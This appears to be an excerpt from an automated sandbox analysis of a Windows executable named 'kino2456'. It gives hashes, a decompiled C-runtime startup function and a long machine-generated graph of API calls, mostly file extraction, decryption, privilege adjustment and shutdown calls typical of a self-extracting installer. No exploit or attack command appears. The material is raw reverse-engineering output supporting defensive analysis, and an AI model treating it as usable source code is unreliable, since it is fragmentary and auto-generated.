• Instruction Fuzzy Hash: 36F028320081506EE7321B28EC888BBBF9CDF87354B2A01AFE492A2001D6A50D069B61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E009669B0() {
	intOrPtr* _t4;
	intOrPtr* _t5;
	void* _t6;
	intOrPtr _t11;
	intOrPtr _t12;

	 *0x9681f8 = E00966C70();
	__set_app_type(E00966FBE(2));
	 *0x9688a4 =  *0x9688a4 | 0xffffffff;
	 *0x9688a8 =  *0x9688a8 | 0xffffffff;
	_t4 = __p__fmode();
	_t11 =  *0x968528; // 0x0
	 *_t4 = _t11;
	_t5 = __p__commode();
	_t12 =  *0x96851c; // 0x0
	 *_t5 = _t12;
	_t6 = E00967000();
	if( *0x968000 == 0) {
		__setusermatherr(E00967000);
	}
	E009671EF(_t6);
	return 0;
}








0x009669b7
0x009669c2
0x009669c8
0x009669cf
0x009669d8
0x009669de
0x009669e4
0x009669e6
0x009669ec
0x009669f2
0x009669f4
0x00966a00
0x00966a07
0x00966a0d
0x00966a0e
0x00966a15

APIs
  • Part of subcall function 00966FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00966FC5
• __set_app_type.MSVCRT ref: 009669C2
• __p__fmode.MSVCRT ref: 009669D8
• __p__commode.MSVCRT ref: 009669E6
• __setusermatherr.MSVCRT ref: 00966A07
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: 55a655224e96dadac37fa57e7b80c7eac64952b402039b2385cf15e585c4c993
• Instruction ID: 251a4bf9a83a470c3bac75d46d6870cdb1e93a6138fdb1d0fbe55985de4bf9e5
• Opcode Fuzzy Hash: 55a655224e96dadac37fa57e7b80c7eac64952b402039b2385cf15e585c4c993
• Instruction Fuzzy Hash: 7AF0F8701AC3019FC714AF70ED1A6067BA1FB85325B10075DE472962F0CFBA8540AE11
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 26.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 967
Total number of Limit Nodes: 41
                                                                                                                                                                                                                                    execution_graph 2196 194ad0 2204 193680 2196->2204 2199 194ae9 2200 194aee WriteFile 2201 194b0f 2200->2201 2202 194b14 2200->2202 2202->2201 2203 194b3b SendDlgItemMessageA 2202->2203 2203->2201 2205 193691 MsgWaitForMultipleObjects 2204->2205 2206 1936a9 PeekMessageA 2205->2206 2207 1936e8 2205->2207 2206->2205 2208 1936bc 2206->2208 2207->2199 2207->2200 2208->2205 2208->2207 2209 1936c7 DispatchMessageA 2208->2209 2210 1936d1 PeekMessageA 2208->2210 2209->2210 2210->2208 2211 194cd0 2212 194cf4 2211->2212 2214 194d0b 2211->2214 2213 194d02 2212->2213 2215 194b60 FindCloseChangeNotification 2212->2215 2268 196ce0 2213->2268 2214->2213 2217 194dcb 2214->2217 2220 194d25 2214->2220 2215->2213 2218 194dd4 SetDlgItemTextA 2217->2218 2221 194de3 2217->2221 2218->2221 2219 194e95 2220->2213 2234 194c37 2220->2234 2221->2213 2242 19476d 2221->2242 2224 194e38 2224->2213 2251 194980 2224->2251 2230 194e64 2259 1947e0 LocalAlloc 2230->2259 2233 194e6f 2233->2213 2235 194c88 2234->2235 2236 194c4c DosDateTimeToFileTime 2234->2236 2235->2213 2239 194b60 2235->2239 2236->2235 2237 194c5e LocalFileTimeToFileTime 2236->2237 2237->2235 2238 194c70 SetFileTime 2237->2238 2238->2235 2240 194b92 FindCloseChangeNotification 2239->2240 2241 194b76 SetFileAttributesA 2239->2241 2240->2241 2241->2213 2273 1966ae GetFileAttributesA 2242->2273 2244 19477b 2244->2224 2246 1947cc SetFileAttributesA 2247 1947db 2246->2247 2247->2224 2250 1947c2 2250->2246 2252 194990 2251->2252 2253 1949c2 lstrcmpA 2252->2253 2254 1949a5 2252->2254 2255 194a0e 2253->2255 2258 1949ba 2253->2258 2256 1944b9 20 API calls 2254->2256 2255->2258 2338 19487a 2255->2338 2256->2258 2258->2213 2258->2230 2260 19480f LocalAlloc 2259->2260 2261 1947f6 2259->2261 2264 194831 2260->2264 2267 
19480b 2260->2267 2262 1944b9 20 API calls 2261->2262 2262->2267 2265 1944b9 20 API calls 2264->2265 2266 194846 LocalFree 2265->2266 2266->2267 2267->2233 2269 196ce8 2268->2269 2270 196ceb 2268->2270 2269->2219 2351 196cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2270->2351 2272 196e26 2272->2219 2274 194777 2273->2274 2274->2244 2274->2246 2275 196517 FindResourceA 2274->2275 2276 19656b 2275->2276 2277 196536 LoadResource 2275->2277 2282 1944b9 2276->2282 2277->2276 2278 196544 DialogBoxIndirectParamA FreeResource 2277->2278 2278->2276 2280 1947b1 2278->2280 2280->2246 2280->2247 2280->2250 2283 1944fe LoadStringA 2282->2283 2294 19455a 2282->2294 2284 194562 2283->2284 2285 194527 2283->2285 2290 1945c9 2284->2290 2295 19457e LocalAlloc 2284->2295 2311 19681f 2285->2311 2287 196ce0 4 API calls 2288 194689 2287->2288 2288->2280 2292 194607 LocalAlloc 2290->2292 2297 1945cd 2290->2297 2292->2294 2305 1945c4 2292->2305 2294->2287 2295->2294 2304 1945af 2295->2304 2296 194536 MessageBoxA 2296->2294 2297->2297 2298 1945d9 LocalAlloc 2297->2298 2298->2294 2301 1945f3 2298->2301 2299 19462d MessageBeep 2303 19681f 10 API calls 2299->2303 2302 19171e _vsnprintf 2301->2302 2302->2305 2306 19463b 2303->2306 2328 19171e 2304->2328 2305->2299 2308 194645 MessageBoxA LocalFree 2306->2308 2309 1967c9 EnumResourceLanguagesA 2306->2309 2308->2294 2309->2308 2312 196857 GetVersionExA 2311->2312 2321 19691a 2311->2321 2314 19687c 2312->2314 2312->2321 2313 196ce0 4 API calls 2315 19452c 2313->2315 2316 1968a5 GetSystemMetrics 2314->2316 2314->2321 2315->2296 2322 1967c9 2315->2322 2317 1968b5 RegOpenKeyExA 2316->2317 2316->2321 2318 1968d6 RegQueryValueExA RegCloseKey 2317->2318 2317->2321 2319 19690c 2318->2319 2318->2321 2332 1966f9 2319->2332 2321->2313 2323 1967e2 2322->2323 2324 196803 2322->2324 2336 196793 EnumResourceLanguagesA 2323->2336 2324->2296 2326 1967f5 2326->2324 2337 196793 EnumResourceLanguagesA 2326->2337 2329 
19172d 2328->2329 2330 19173d _vsnprintf 2329->2330 2331 19175d 2329->2331 2330->2331 2331->2305 2333 19670f 2332->2333 2334 196740 CharNextA 2333->2334 2335 19674b 2333->2335 2334->2333 2335->2321 2336->2326 2337->2324 2339 1948a2 CreateFileA 2338->2339 2341 1948e9 2339->2341 2342 194908 2339->2342 2341->2342 2343 1948ee 2341->2343 2342->2258 2346 19490c 2343->2346 2347 1948f5 CreateFileA 2346->2347 2348 194917 2346->2348 2347->2342 2348->2347 2349 194962 CharNextA 2348->2349 2350 194953 CreateDirectoryA 2348->2350 2349->2348 2350->2349 2351->2272 3128 193210 3129 193227 3128->3129 3153 19328e EndDialog 3128->3153 3130 1933e2 GetDesktopWindow 3129->3130 3131 193235 3129->3131 3181 1943d0 6 API calls 3130->3181 3133 193239 3131->3133 3135 1932dd GetDlgItemTextA 3131->3135 3136 19324c 3131->3136 3142 193366 3135->3142 3147 1932fc 3135->3147 3139 193251 3136->3139 3140 1932c5 EndDialog 3136->3140 3138 19341f GetDlgItem EnableWindow 3138->3133 3139->3133 3141 19325c LoadStringA 3139->3141 3140->3133 3143 19327b 3141->3143 3144 193294 3141->3144 3145 1944b9 20 API calls 3142->3145 3149 1944b9 20 API calls 3143->3149 3166 194224 LoadLibraryA 3144->3166 3145->3133 3147->3142 3148 193331 GetFileAttributesA 3147->3148 3151 19337c 3148->3151 3152 19333f 3148->3152 3149->3153 3155 19658a CharPrevA 3151->3155 3156 1944b9 20 API calls 3152->3156 3153->3133 3154 1932a5 SetDlgItemTextA 3154->3133 3154->3143 3157 19338d 3155->3157 3158 193351 3156->3158 3159 1958c8 27 API calls 3157->3159 3158->3133 3160 19335a CreateDirectoryA 3158->3160 3161 193394 3159->3161 3160->3142 3160->3151 3161->3142 3162 1933a4 3161->3162 3163 1933c7 EndDialog 3162->3163 3164 19597d 34 API calls 3162->3164 3163->3133 3165 1933c3 3164->3165 3165->3133 3165->3163 3167 1943b2 3166->3167 3168 194246 GetProcAddress 3166->3168 3172 1944b9 20 API calls 3167->3172 3169 19425d GetProcAddress 3168->3169 3170 1943a4 FreeLibrary 3168->3170 3169->3170 3171 194274 GetProcAddress 3169->3171 3170->3167 3171->3170 3174 
19428b 3171->3174 3173 19329d 3172->3173 3173->3133 3173->3154 3175 194295 GetTempPathA 3174->3175 3176 1942e1 3174->3176 3177 1942ad 3175->3177 3180 194390 FreeLibrary 3176->3180 3177->3177 3178 1942b4 CharPrevA 3177->3178 3178->3176 3179 1942d0 CharPrevA 3178->3179 3179->3176 3180->3173 3183 194463 SetWindowPos 3181->3183 3184 196ce0 4 API calls 3183->3184 3185 1933f1 SetWindowTextA SendDlgItemMessageA 3184->3185 3185->3133 3185->3138 3186 194a50 3187 194a9f ReadFile 3186->3187 3188 194a66 3186->3188 3190 194abb 3187->3190 3189 194a82 memcpy 3188->3189 3188->3190 3189->3190 3191 193450 3192 19345e 3191->3192 3193 1934d3 EndDialog 3191->3193 3195 19349a GetDesktopWindow 3192->3195 3196 193465 3192->3196 3194 19346a 3193->3194 3197 1943d0 11 API calls 3195->3197 3196->3194 3199 19348c EndDialog 3196->3199 3198 1934ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3197->3198 3198->3194 3199->3194 2352 196f40 SetUnhandledExceptionFilter 2353 194cc0 GlobalFree 3200 194200 3201 19420b SendMessageA 3200->3201 3202 19421e 3200->3202 3201->3202 3203 193100 3204 193111 3203->3204 3205 1931b0 3203->3205 3207 193149 GetDesktopWindow 3204->3207 3210 19311d 3204->3210 3206 1931b9 SendDlgItemMessageA 3205->3206 3211 193141 3205->3211 3206->3211 3209 1943d0 11 API calls 3207->3209 3208 193138 EndDialog 3208->3211 3212 19315d 6 API calls 3209->3212 3210->3208 3210->3211 3212->3211 3213 194bc0 3215 194bd7 3213->3215 3216 194c05 3213->3216 3214 194c1b SetFilePointer 3214->3215 3216->3214 3216->3215 3217 1930c0 3218 1930de CallWindowProcA 3217->3218 3219 1930ce 3217->3219 3220 1930da 3218->3220 3219->3218 3219->3220 3221 1963c0 3222 196407 3221->3222 3223 19658a CharPrevA 3222->3223 3224 196415 CreateFileA 3223->3224 3225 196448 WriteFile 3224->3225 3226 19643a 3224->3226 3227 196465 CloseHandle 3225->3227 3229 196ce0 4 API calls 3226->3229 3227->3226 3230 19648f 3229->3230 3231 196c03 3232 196c1e 3231->3232 3233 196c17 _exit 3231->3233 3234 196c27 _cexit 3232->3234 3235 196c32 
3232->3235 3233->3232 3234->3235 3236 197270 _except_handler4_common 3237 1969b0 3238 1969b5 3237->3238 3246 196fbe GetModuleHandleW 3238->3246 3240 1969c1 __set_app_type __p__fmode __p__commode 3241 1969f9 3240->3241 3242 196a0e 3241->3242 3243 196a02 __setusermatherr 3241->3243 3248 1971ef _controlfp 3242->3248 3243->3242 3245 196a13 3247 196fcf 3246->3247 3247->3240 3248->3245 3249 1934f0 3250 193504 3249->3250 3268 1935b8 3249->3268 3251 19351b 3250->3251 3252 1935be GetDesktopWindow 3250->3252 3250->3268 3255 19354f 3251->3255 3256 19351f 3251->3256 3254 1943d0 11 API calls 3252->3254 3253 193526 3258 1935d6 3254->3258 3255->3253 3260 193559 ResetEvent 3255->3260 3256->3253 3259 19352d TerminateThread EndDialog 3256->3259 3257 193671 EndDialog 3257->3253 3261 19361d SetWindowTextA CreateThread 3258->3261 3262 1935e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3258->3262 3259->3253 3263 1944b9 20 API calls 3260->3263 3261->3253 3264 193646 3261->3264 3262->3261 3265 193581 3263->3265 3266 1944b9 20 API calls 3264->3266 3267 19359b SetEvent 3265->3267 3269 19358a SetEvent 3265->3269 3266->3268 3270 193680 4 API calls 3267->3270 3268->3253 3268->3257 3269->3253 3270->3268 3271 196ef0 3272 196f2d 3271->3272 3274 196f02 3271->3274 3273 196f27 ?terminate@ 3273->3272 3274->3272 3274->3273 3275 196bef _XcptFilter 2354 194ca0 GlobalAlloc 2355 196a60 2372 197155 2355->2372 2357 196a65 2358 196a76 GetStartupInfoW 2357->2358 2359 196a93 2358->2359 2360 196aa8 2359->2360 2361 196aaf Sleep 2359->2361 2362 196ac7 _amsg_exit 2360->2362 2363 196ad1 2360->2363 2361->2359 2362->2363 2364 196b13 _initterm 2363->2364 2366 196af4 2363->2366 2370 196b2e __IsNonwritableInCurrentImage 2363->2370 2364->2370 2365 196bd6 _ismbblead 2365->2370 2367 196c1e 2367->2366 2369 196c27 _cexit 2367->2369 2369->2366 2370->2365 2370->2367 2371 196bbe exit 2370->2371 2377 192bfb GetVersion 2370->2377 2371->2370 2373 19717a 2372->2373 2374 19717e GetSystemTimeAsFileTime GetCurrentProcessId 
GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2374 2373->2374 2375 1971e2 2373->2375 2376 1971cd 2374->2376 2375->2357 2376->2375 2378 192c0f 2377->2378 2379 192c50 2377->2379 2378->2379 2381 192c13 GetModuleHandleW 2378->2381 2394 192caa memset memset memset 2379->2394 2381->2379 2382 192c22 GetProcAddress 2381->2382 2382->2379 2388 192c34 2382->2388 2384 192c8e 2385 192c9e 2384->2385 2386 192c97 CloseHandle 2384->2386 2385->2370 2386->2385 2388->2379 2392 192c89 2489 191f90 2392->2489 2506 19468f FindResourceA SizeofResource 2394->2506 2397 192e30 2399 1944b9 20 API calls 2397->2399 2398 192d2d CreateEventA SetEvent 2400 19468f 7 API calls 2398->2400 2402 192f06 2399->2402 2401 192d57 2400->2401 2403 192d5b 2401->2403 2404 192d7d 2401->2404 2407 196ce0 4 API calls 2402->2407 2405 1944b9 20 API calls 2403->2405 2406 192e1f 2404->2406 2410 19468f 7 API calls 2404->2410 2408 192d6e 2405->2408 2511 195c9e 2406->2511 2411 192c62 2407->2411 2408->2402 2413 192d9f 2410->2413 2411->2384 2435 192f1d 2411->2435 2413->2403 2415 192da3 CreateMutexA 2413->2415 2414 192e3a 2416 192e43 2414->2416 2417 192e52 FindResourceA 2414->2417 2415->2406 2418 192dbd GetLastError 2415->2418 2537 192390 2416->2537 2421 192e6e 2417->2421 2422 192e64 LoadResource 2417->2422 2418->2406 2420 192dca 2418->2420 2423 192dea 2420->2423 2424 192dd5 2420->2424 2421->2408 2552 1936ee GetVersionExA 2421->2552 2422->2421 2426 1944b9 20 API calls 2423->2426 2425 1944b9 20 API calls 2424->2425 2429 192de8 2425->2429 2427 192dff 2426->2427 2427->2406 2430 192e04 CloseHandle 2427->2430 2429->2430 2430->2402 2434 196517 24 API calls 2434->2408 2436 192f6c 2435->2436 2437 192f3f 2435->2437 2661 195164 2436->2661 2439 192f5f 2437->2439 2641 1951e5 2437->2641 2794 193a3f 2439->2794 2441 192f71 2444 193041 2441->2444 2676 1955a0 2441->2676 2448 196ce0 4 API calls 2444->2448 2450 192c6b 2448->2450 2449 192f86 GetSystemDirectoryA 2451 19658a CharPrevA 2449->2451 2476 1952b6 2450->2476 2452 192fab 
LoadLibraryA 2451->2452 2453 192fc0 GetProcAddress 2452->2453 2454 192ff7 FreeLibrary 2452->2454 2453->2454 2457 192fd6 DecryptFileA 2453->2457 2455 193017 SetCurrentDirectoryA 2454->2455 2456 193006 2454->2456 2458 193054 2455->2458 2459 193026 2455->2459 2456->2455 2726 19621e GetWindowsDirectoryA 2456->2726 2457->2454 2464 192ff0 2457->2464 2460 193061 2458->2460 2737 193b26 2458->2737 2462 1944b9 20 API calls 2459->2462 2460->2444 2466 19307a 2460->2466 2746 19256d 2460->2746 2468 193037 2462->2468 2464->2454 2472 193098 2466->2472 2757 193ba2 2466->2757 2813 196285 GetLastError 2468->2813 2472->2444 2473 1930af 2472->2473 2815 194169 2473->2815 2478 1952d6 2476->2478 2486 195316 2476->2486 2477 195300 LocalFree LocalFree 2477->2478 2477->2486 2478->2477 2481 1952eb SetFileAttributesA DeleteFileA 2478->2481 2479 19538c 2482 196ce0 4 API calls 2479->2482 2480 195374 2480->2479 3124 191fe1 2480->3124 2481->2477 2484 192c72 2482->2484 2484->2384 2484->2392 2485 19535e SetCurrentDirectoryA 2487 192390 13 API calls 2485->2487 2486->2480 2486->2485 2488 1965e8 4 API calls 2486->2488 2487->2480 2488->2485 2490 191f9a 2489->2490 2491 191f9f 2489->2491 2492 191ea7 15 API calls 2490->2492 2493 191fc0 2491->2493 2494 1944b9 20 API calls 2491->2494 2497 191fd9 2491->2497 2492->2491 2495 191ee2 GetCurrentProcess OpenProcessToken 2493->2495 2496 191fcf ExitWindowsEx 2493->2496 2493->2497 2494->2493 2499 191f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2502 191f0e 2495->2502 2496->2497 2497->2384 2500 191f6b ExitWindowsEx 2499->2500 2499->2502 2501 191f1f 2500->2501 2500->2502 2504 196ce0 4 API calls 2501->2504 2503 1944b9 20 API calls 2502->2503 2503->2501 2505 191f8c 2504->2505 2505->2384 2507 192d1a 2506->2507 2508 1946b6 2506->2508 2507->2397 2507->2398 2508->2507 2509 1946be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 1946df memcpy_s FreeResource 2509->2510 2510->2507 2518 195e17 2511->2518 2535 195cc3 2511->2535 2512 
195dd0 2516 195dec GetModuleFileNameA 2512->2516 2512->2518 2513 196ce0 4 API calls 2515 192e2c 2513->2515 2514 195ced CharNextA 2514->2535 2515->2397 2515->2414 2517 195e0a 2516->2517 2516->2518 2587 1966c8 2517->2587 2518->2513 2520 196218 2596 196e2a 2520->2596 2523 195e36 CharUpperA 2524 1961d0 2523->2524 2523->2535 2525 1944b9 20 API calls 2524->2525 2526 1961e7 2525->2526 2527 1961f0 CloseHandle 2526->2527 2528 1961f7 ExitProcess 2526->2528 2527->2528 2529 195f9f CharUpperA 2529->2535 2530 195f59 CompareStringA 2530->2535 2531 196003 CharUpperA 2531->2535 2532 195edc CharUpperA 2532->2535 2533 1960a2 CharUpperA 2533->2535 2534 19667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2514 2535->2518 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 19658a 2535->2592 2538 1924cb 2537->2538 2541 1923b9 2537->2541 2539 196ce0 4 API calls 2538->2539 2540 1924dc 2539->2540 2540->2408 2541->2538 2542 1923e9 FindFirstFileA 2541->2542 2542->2538 2543 192407 2542->2543 2544 192479 2543->2544 2545 192421 lstrcmpA 2543->2545 2546 1924a9 FindNextFileA 2543->2546 2550 19658a CharPrevA 2543->2550 2551 192390 5 API calls 2543->2551 2548 192488 SetFileAttributesA DeleteFileA 2544->2548 2545->2546 2547 192431 lstrcmpA 2545->2547 2546->2543 2549 1924bd FindClose RemoveDirectoryA 2546->2549 2547->2543 2547->2546 2548->2546 2549->2538 2550->2543 2551->2543 2556 193737 2552->2556 2559 19372d 2552->2559 2553 1944b9 20 API calls 2566 1939fc 2553->2566 2554 196ce0 4 API calls 2555 192e92 2554->2555 2555->2402 2555->2408 2567 1918a3 2555->2567 2558 1938a4 2556->2558 2556->2559 2556->2566 2603 1928e8 2556->2603 2558->2559 2560 1939c1 MessageBeep 2558->2560 2558->2566 2559->2553 2559->2566 2561 19681f 10 API calls 2560->2561 2562 1939ce 2561->2562 2563 1939d8 MessageBoxA 2562->2563 2564 1967c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2554 2568 1919b8 2567->2568 2569 1918d5 2567->2569 2570 196ce0 4 API calls 2568->2570 
2632 1917ee LoadLibraryA 2569->2632 2573 1919d5 2570->2573 2573->2408 2573->2434 2574 1918e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 191900 GetTokenInformation 2574->2575 2576 191918 GetLastError 2575->2576 2577 1919aa CloseHandle 2575->2577 2576->2577 2578 191927 LocalAlloc 2576->2578 2577->2568 2579 1919a9 2578->2579 2580 191938 GetTokenInformation 2578->2580 2579->2577 2581 19194e AllocateAndInitializeSid 2580->2581 2582 1919a2 LocalFree 2580->2582 2581->2582 2586 19196e 2581->2586 2582->2579 2583 191999 FreeSid 2583->2582 2584 191975 EqualSid 2585 19198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2589 1966d5 2587->2589 2588 1966f3 2588->2518 2589->2588 2591 1966e5 CharNextA 2589->2591 2599 196648 2589->2599 2591->2589 2593 19659b 2592->2593 2593->2593 2594 1965ab 2593->2594 2595 1965b8 CharPrevA 2593->2595 2594->2535 2595->2594 2602 196cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 19621d 2600 19665d IsDBCSLeadByte 2599->2600 2601 196668 2599->2601 2600->2601 2601->2589 2602->2598 2604 192a62 2603->2604 2611 19290d 2603->2611 2605 192a6e GlobalFree 2604->2605 2606 192a75 2604->2606 2605->2606 2606->2558 2608 192955 GlobalAlloc 2608->2604 2609 192968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 192a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 192a80 GlobalUnlock 2611->2612 2613 192773 2611->2613 2612->2604 2614 1927a3 CharUpperA CharNextA CharNextA 2613->2614 2615 1928b2 2613->2615 2616 1927db 2614->2616 2617 1928b7 GetSystemDirectoryA 2614->2617 2615->2617 2619 1928a8 GetWindowsDirectoryA 2616->2619 2620 1927e3 2616->2620 2618 1928bf 2617->2618 2621 1928d2 2618->2621 2622 19658a CharPrevA 2618->2622 2619->2618 2624 19658a CharPrevA 2620->2624 2623 196ce0 4 API calls 2621->2623 2622->2621 2625 1928e2 2623->2625 2626 192810 RegOpenKeyExA 2624->2626 2625->2611 2626->2618 2627 192837 RegQueryValueExA 2626->2627 2628 19289a RegCloseKey 2627->2628 
2629 19285c 2627->2629 2628->2618 2630 192867 ExpandEnvironmentStringsA 2629->2630 2631 19287a 2629->2631 2630->2631 2631->2628 2633 191890 2632->2633 2634 191826 GetProcAddress 2632->2634 2635 196ce0 4 API calls 2633->2635 2636 191889 FreeLibrary 2634->2636 2637 191839 AllocateAndInitializeSid 2634->2637 2638 19189f 2635->2638 2636->2633 2637->2636 2639 19185f FreeSid 2637->2639 2638->2568 2638->2574 2639->2636 2642 19468f 7 API calls 2641->2642 2643 1951f9 LocalAlloc 2642->2643 2644 19522d 2643->2644 2645 19520d 2643->2645 2647 19468f 7 API calls 2644->2647 2646 1944b9 20 API calls 2645->2646 2648 19521e 2646->2648 2649 19523a 2647->2649 2650 196285 GetLastError 2648->2650 2651 19523e 2649->2651 2652 195262 lstrcmpA 2649->2652 2660 195223 2650->2660 2655 1944b9 20 API calls 2651->2655 2653 19527e 2652->2653 2654 195272 LocalFree 2652->2654 2656 1944b9 20 API calls 2653->2656 2658 192f4d 2654->2658 2657 19524f LocalFree 2655->2657 2659 195290 LocalFree 2656->2659 2657->2658 2658->2436 2658->2439 2658->2444 2659->2660 2660->2658 2662 19468f 7 API calls 2661->2662 2663 195175 2662->2663 2664 19517a 2663->2664 2665 1951af 2663->2665 2667 1944b9 20 API calls 2664->2667 2666 19468f 7 API calls 2665->2666 2668 1951c0 2666->2668 2675 19518d 2667->2675 2828 196298 2668->2828 2672 1951ce 2674 1944b9 20 API calls 2672->2674 2673 1951e1 2673->2441 2674->2675 2675->2441 2677 19468f 7 API calls 2676->2677 2678 1955c7 LocalAlloc 2677->2678 2679 1955db 2678->2679 2680 1955fd 2678->2680 2681 1944b9 20 API calls 2679->2681 2682 19468f 7 API calls 2680->2682 2683 1955ec 2681->2683 2684 19560a 2682->2684 2685 196285 GetLastError 2683->2685 2686 19560e 2684->2686 2687 195632 lstrcmpA 2684->2687 2688 1955f1 2685->2688 2689 1944b9 20 API calls 2686->2689 2690 19564b LocalFree 2687->2690 2691 195645 2687->2691 2714 1955f6 2688->2714 2694 19561f LocalFree 2689->2694 2692 19565b 2690->2692 2693 195696 2690->2693 2691->2690 2699 195467 49 API calls 2692->2699 2695 19589f 2693->2695 2698 
1956ae GetTempPathA 2693->2698 2694->2714 2696 196517 24 API calls 2695->2696 2696->2714 2697 196ce0 4 API calls 2700 192f7e 2697->2700 2701 1956c3 2698->2701 2705 1956eb 2698->2705 2702 195678 2699->2702 2700->2444 2700->2449 2840 195467 2701->2840 2704 195680 2702->2704 2702->2714 2707 1944b9 20 API calls 2704->2707 2708 19586c GetWindowsDirectoryA 2705->2708 2709 195717 GetDriveTypeA 2705->2709 2705->2714 2707->2688 2874 19597d GetCurrentDirectoryA SetCurrentDirectoryA 2708->2874 2712 195730 GetFileAttributesA 2709->2712 2724 19572b 2709->2724 2712->2724 2714->2697 2715 195467 49 API calls 2715->2705 2717 192630 21 API calls 2717->2724 2718 1957c1 GetWindowsDirectoryA 2718->2724 2719 19658a CharPrevA 2721 1957e8 GetFileAttributesA 2719->2721 2720 19597d 34 API calls 2720->2724 2722 1957fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 195827 SetFileAttributesA 2723->2724 2724->2708 2724->2709 2724->2712 2724->2714 2724->2717 2724->2718 2724->2719 2724->2720 2724->2723 2725 195467 49 API calls 2724->2725 2870 196952 2724->2870 2725->2724 2727 196249 2726->2727 2728 196268 2726->2728 2729 1944b9 20 API calls 2727->2729 2730 19597d 34 API calls 2728->2730 2731 19625a 2729->2731 2732 196277 2730->2732 2733 196285 GetLastError 2731->2733 2734 196ce0 4 API calls 2732->2734 2735 19625f 2733->2735 2736 193013 2734->2736 2735->2732 2736->2444 2736->2455 2738 193b2d 2737->2738 2738->2738 2739 193b72 2738->2739 2740 193b53 2738->2740 2941 194fe0 2739->2941 2742 196517 24 API calls 2740->2742 2743 193b70 2742->2743 2744 196298 10 API calls 2743->2744 2745 193b7b 2743->2745 2744->2745 2745->2460 2747 192583 2746->2747 2748 192622 2746->2748 2750 1925e8 RegOpenKeyExA 2747->2750 2751 19258b 2747->2751 2971 1924e0 GetWindowsDirectoryA 2748->2971 2752 1925e3 2750->2752 2753 192609 RegQueryInfoKeyA 2750->2753 2751->2752 2755 19259b RegOpenKeyExA 2751->2755 2752->2466 2754 1925d1 RegCloseKey 2753->2754 2754->2752 2755->2752 2756 1925bc RegQueryValueExA 2755->2756 
2756->2754 2758 193bdb 2757->2758 2771 193bec 2757->2771 2759 19468f 7 API calls 2758->2759 2759->2771 2760 193c03 memset 2760->2771 2761 193d13 2762 1944b9 20 API calls 2761->2762 2790 193d26 2762->2790 2764 193f4d 2766 196ce0 4 API calls 2764->2766 2765 19468f 7 API calls 2765->2771 2768 193f60 2766->2768 2767 193d7b CompareStringA 2767->2771 2779 193fd7 2767->2779 2768->2472 2770 193fab 2773 1944b9 20 API calls 2770->2773 2771->2760 2771->2761 2771->2764 2771->2765 2771->2767 2771->2770 2774 193f1e LocalFree 2771->2774 2775 193f46 LocalFree 2771->2775 2771->2779 2780 193cc7 CompareStringA 2771->2780 2791 193e10 2771->2791 2979 191ae8 2771->2979 3019 19202a memset memset RegCreateKeyExA 2771->3019 3045 193fef 2771->3045 2777 193fbe LocalFree 2773->2777 2774->2771 2774->2779 2775->2764 2777->2764 2779->2764 3069 192267 2779->3069 2780->2771 2781 193e1f GetProcAddress 2783 193f64 2781->2783 2781->2791 2782 193f92 2784 1944b9 20 API calls 2782->2784 2785 1944b9 20 API calls 2783->2785 2786 193fa9 2784->2786 2787 193f75 FreeLibrary 2785->2787 2788 193f7c LocalFree 2786->2788 2787->2788 2789 196285 GetLastError 2788->2789 2789->2790 2790->2764 2791->2781 2791->2782 2792 193eff FreeLibrary 2791->2792 2793 193f40 FreeLibrary 2791->2793 3059 196495 2791->3059 2792->2774 2793->2775 2795 19468f 7 API calls 2794->2795 2796 193a55 LocalAlloc 2795->2796 2797 193a6c 2796->2797 2798 193a8e 2796->2798 2799 1944b9 20 API calls 2797->2799 2800 19468f 7 API calls 2798->2800 2801 193a7d 2799->2801 2802 193a98 2800->2802 2803 196285 GetLastError 2801->2803 2804 193a9c 2802->2804 2805 193ac5 lstrcmpA 2802->2805 2806 192f64 2803->2806 2807 1944b9 20 API calls 2804->2807 2808 193ada 2805->2808 2809 193b0d LocalFree 2805->2809 2806->2436 2806->2444 2811 193aad LocalFree 2807->2811 2810 196517 24 API calls 2808->2810 2809->2806 2812 193aec LocalFree 2810->2812 2811->2806 2812->2806 2814 19303c 2813->2814 2814->2444 2816 19468f 7 API calls 2815->2816 2817 19417d LocalAlloc 2816->2817 2818 
